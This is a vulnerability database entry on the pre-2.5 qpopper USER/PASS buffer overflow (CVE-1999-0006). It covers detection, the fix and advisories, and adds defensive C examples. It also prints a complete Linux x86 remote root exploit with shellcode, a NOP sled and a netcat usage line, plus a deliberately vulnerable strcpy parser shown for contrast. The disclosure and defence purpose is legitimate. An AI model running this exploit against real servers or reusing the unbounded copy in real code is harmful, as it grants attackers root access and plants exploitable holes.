Qpopper Overflow

Vulnerability Description

Brief description: A number of buffer overflows exist in versions of Qualcomm's qpopper program prior to 2.5. They allow a remote user, without a valid account, to execute arbitrary commands on a host running a vulnerable version.

Full description: The vulnerability lies in the way qpopper handles user-supplied input for a number of POP commands, including but not limited to USER and PASS, and in its handling of any line longer than 1024 characters. The over-long input is copied into a fixed-size stack buffer without a length check, so it overwrites what follows the buffer, including the saved return address. Because USER and PASS are processed before authentication, the attacker needs no account on the host.
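The defect described above, as an added example written for this entry rather than taken from qpopper's source: a minimal POP3 command-line handler in the vulnerable shape (an unbounded copy into a fixed stack buffer) beside a hardened form that measures the line first and refuses anything that does not fit. All names (pop_cmd, parse_unbounded, parse_bounded, MAXVERB, MAXARG) and the 1024-byte buffer size are assumptions made for the illustration; only the 1024 limit comes from the description.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define MAXLINELEN 1024   /* the line limit named in the description (assumed buffer size) */
#define MAXVERB    16
#define MAXARG     (MAXLINELEN - MAXVERB)

struct pop_cmd {
    char verb[MAXVERB];   /* e.g. "USER", "PASS" */
    char arg[MAXARG];     /* the rest of the line */
};

/* Vulnerable shape (hypothetical, modelled on the advisory): the client
 * line is copied into a fixed stack buffer with no length check, so a USER
 * or PASS line of MAXLINELEN bytes or more overwrites what follows the
 * buffer on the stack, including the saved return address. Shown only for
 * contrast; never call it on client input. */
static void parse_unbounded(const char *input, struct pop_cmd *out)
{
    char line[MAXLINELEN];
    strcpy(line, input);                         /* overflow if strlen(input) >= MAXLINELEN */
    out->verb[0] = out->arg[0] = '\0';
    sscanf(line, "%s %s", out->verb, out->arg);  /* %s without a width is unbounded too */
}

/* Hardened form: measure first, reject anything that does not fit (no
 * silent truncation, which would let "PASS <1030 bytes>" be accepted as a
 * shorter password), and bound every copy by its destination.
 * Returns 0 on success, -1 for an over-long or malformed line. */
static int parse_bounded(const char *input, struct pop_cmd *out)
{
    size_t len = strcspn(input, "\r\n");         /* bytes before the line end */
    if (len == 0 || len >= MAXLINELEN) return -1;

    size_t vlen = strcspn(input, " \r\n");       /* verb runs to the first space or EOL */
    if (vlen == 0 || vlen >= MAXVERB) return -1;
    memcpy(out->verb, input, vlen);
    out->verb[vlen] = '\0';
    for (size_t i = 0; i < vlen; i++)            /* POP verbs are case-insensitive */
        out->verb[i] = (char)toupper((unsigned char)out->verb[i]);

    const char *p = input + vlen;
    while (*p == ' ') p++;
    size_t alen = strcspn(p, "\r\n");
    if (alen >= MAXARG) return -1;
    memcpy(out->arg, p, alen);
    out->arg[alen] = '\0';
    return 0;
}

/* Constructed inputs, for a stand-alone run and for checks. */
static int demo_parse_user(void)
{
    struct pop_cmd c;
    if (parse_bounded("user alice\r\n", &c) != 0) return 0;
    return strcmp(c.verb, "USER") == 0 && strcmp(c.arg, "alice") == 0;
}

static int demo_reject_long_pass(void)
{
    char line[1100];
    memcpy(line, "PASS ", 5);
    memset(line + 5, 'A', 1090);                 /* 1095-byte line: over the 1024 limit */
    memcpy(line + 1095, "\r\n", 3);              /* copies the terminating NUL as well */
    struct pop_cmd c;
    return parse_bounded(line, &c);              /* -1: rejected before any copy is made */
}

int main(void)
{
    struct pop_cmd c;
    parse_unbounded("USER bob", &c);             /* safe only because this input is short */
    printf("unbounded parse: %s %s\n", c.verb, c.arg);
    printf("bounded USER parse ok: %d\n", demo_parse_user());
    printf("bounded over-long PASS: %d\n", demo_reject_long_pass());
    return 0;
}
```

The point of the hardened version is the order of operations: the length is checked with strcspn before a single byte is written, and a line that is too long is refused with a protocol error rather than truncated, so the 1024-character limit becomes a rejection rather than a stack write.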

Components: qpopper 2.4 and below (trusted), qpopper 2.5beta (trusted); versions 2.5 and later are not vulnerable

Systems: SCO OpenServer Releases 5.0.0; SCO OpenServer Releases 5.0.2; SCO OpenServer Releases 5.0.4; SCO Internet FastStart Releases 1.0; SCO Internet FastStart Releases 1.1; versions SCO UnixWare 7, SCO UnixWare 2.1, SCO CMW+, SCO Open Desktop / Open Server 3.0, and SCO UNIX 3.2v4 are not vulnerable

Effect(s) of exploiting: A remote attacker can make qpopper execute arbitrary commands with the privileges of the POP server, which on the affected systems runs as root; no account on the host is required, since the overflowed commands are processed before authentication.

Detecting the hole:

    1. Telnet (or netcat) to port 110 on the possibly vulnerable host. qpopper greets with a banner of the form "+OK QPOP (version 2.4) at hostname starting." which names the server version; compare it with the Components list above, remembering that 2.5beta counts as vulnerable. The check is only as good as the banner: a server whose greeting has been altered, or a vendor build patched without changing the version string, cannot be classified this way.
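The banner check above, as an added example written for this entry (not code from the database or from Qualcomm): a function that classifies a captured greeting line as vulnerable, fixed, or not a qpopper banner, using the cut-off given in the Components field. The function name and the sample banners are constructed for the illustration; the numbering rule it assumes (2.53 means 2.5 patch 3, so only the first digit after the dot is the minor version) is stated in the comment.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Classify a POP3 greeting by the version qpopper prints in it.
 * Returns  1  if the banner names a version in the vulnerable range
 *            (anything below 2.5, or a 2.5 beta),
 *          0  if it names 2.5 or later,
 *         -1  if it is not a qpopper banner, so nothing can be concluded.
 * Assumes Qualcomm's numbering in which 2.53 means 2.5 patch 3, i.e. only
 * the first digit after the dot is the minor version. */
static int qpopper_banner_vulnerable(const char *banner)
{
    static const char tag[] = "QPOP (version ";
    const char *p = strstr(banner, tag);
    if (p == NULL) return -1;
    p += strlen(tag);

    if (!isdigit((unsigned char)*p)) return -1;
    int major = 0;
    while (isdigit((unsigned char)*p)) major = major * 10 + (*p++ - '0');

    if (*p != '.' || !isdigit((unsigned char)p[1])) return -1;
    p++;
    int minor = *p++ - '0';                       /* first digit only */
    int patch_digits = 0;
    while (isdigit((unsigned char)*p)) { p++; patch_digits++; }

    if (major < 2 || (major == 2 && minor < 5)) return 1;
    if (major == 2 && minor == 5 && patch_digits == 0 &&
        (*p == 'b' || *p == 'B'))                 /* "2.5b1" / "2.5beta" */
        return 1;
    return 0;
}

int main(void)
{
    /* Constructed banners in the format qpopper prints; not captured from a live host. */
    const char *samples[] = {
        "+OK QPOP (version 2.4) at mail.example.com starting.  <1234.900000000@mail.example.com>",
        "+OK QPOP (version 2.5b1) at mail.example.com starting.",
        "+OK QPOP (version 2.53) at mail.example.com starting.",
        "+OK POP3 server ready.",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%2d  %s\n", qpopper_banner_vulnerable(samples[i]), samples[i]);
    return 0;
}
```

In practice the first line read from a connection to port 110 is the banner; feed that line to the function. A -1 result means the host is not advertising qpopper at all and needs another method of identification, not that it is safe.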

Fixing the hole:

    1. Upgrade to the latest version of qpopper, available from Qualcomm at ftp://ftp.qualcomm.com/Eudora/servers/unix/popper ; versions 2.5 and later contain the fix.

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0006 -- Buffer overflow in POP servers based on BSD/Qualcomm's qpopper allows remote attackers to gain root access using a long USER or PASS command.

Exploit Information

Attack: The following program is tweaked for Linux on 32-bit x86. It emits a single over-long line consisting of a NOP sled, execve("/bin/sh") shellcode and a guessed return address, followed by the command "sh -i" for the spawned shell; piped into netcat as shown in the usage comment, it should result in a root prompt if the exploit is successful. The return address is computed from the attacking program's own stack pointer plus the offset argument, so the offset has to be searched for against each target.

/* Exploit for qpopper 2.4 (and others) for Linux
 *   by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com)
 *
 *  usage: (./qpopper <offset>;cat)|nc <victim> 110
 *       with offset around 1000 (try increments of 50)
 *
 *  Targets 32-bit x86 Linux: build with  gcc -m32 -O0 -o qpopper qpopper.c
 *  (the shellcode and return address are 32-bit, and the return address is
 *  guessed from this program's own stack pointer, so it only lands on a
 *  target whose stack layout is similar)
 *
 *    shout outs to: Zef and YZF
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFSIZE 998   /* offset at which the shellcode ends within the payload */

/* Linux/x86 execve("/bin/sh") shellcode, 65 bytes, no NUL bytes */
char shell[] =
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";

/* Current stack pointer; the guessed return address is esp() + offset,
 * which is why the offset must be tuned per target. */
unsigned long esp(void)
{
  unsigned long sp;
  __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
  return sp;
}

int main(int argc, char **argv)
{
  int i, j, offset;
  unsigned long eip;
  char buffer[4096];

  if (argc != 2) {
    fprintf(stderr, "usage: %s <offset>\n", argv[0]);
    return 1;
  }

  j = 0;
  offset = atoi(argv[1]);
  eip = esp() + offset;

  /* NOP sled over the first 1008 bytes of the line ... */
  for (i = 0; i < 1008; i++) buffer[i] = 0x90;
  /* ... with the shellcode placed so that it ends at BUFFSIZE ... */
  for (i = (BUFFSIZE - strlen(shell)); i < BUFFSIZE; i++) buffer[i] = shell[j++];

  /* ... and the guessed return address, little-endian, at byte 1005,
   * where the saved return address is expected to be overwritten. */
  i = 1005;
  buffer[i]   = eip & 0xff;
  buffer[i+1] = (eip >> 8) & 0xff;
  buffer[i+2] = (eip >> 16) & 0xff;
  buffer[i+3] = (eip >> 24) & 0xff;
  buffer[i+4] = '\0';   /* terminate the string; the original left this byte uninitialised */

  /* Send the over-long line, then a command for the shell it spawns. */
  printf("%s\nsh -i\n", buffer);
  return 0;
}

Related Information

Advisories: Security Focus database entry 133 ; CERT Advisory CA-98.08 ; Silicon Graphics Security Advisory 19980801-01-I, BSD/Qualcomm qpopper Vulnerability ; CIAC Advisory I-069, Buffer overflows in some POP servers ; ISS X-Force qpopper-pass-overflow

Related Vulnerabilities:

Reportage

Reporting: Seth McGann (smm@WPI.EDU) in BugTraq message ID: 19980627050419750.AAA323.373@dell166 (Sat Jun 27 1998 00:58:24 )

Revision Number 1

  1. Homer Briggs (6/26/2000):
    Created entry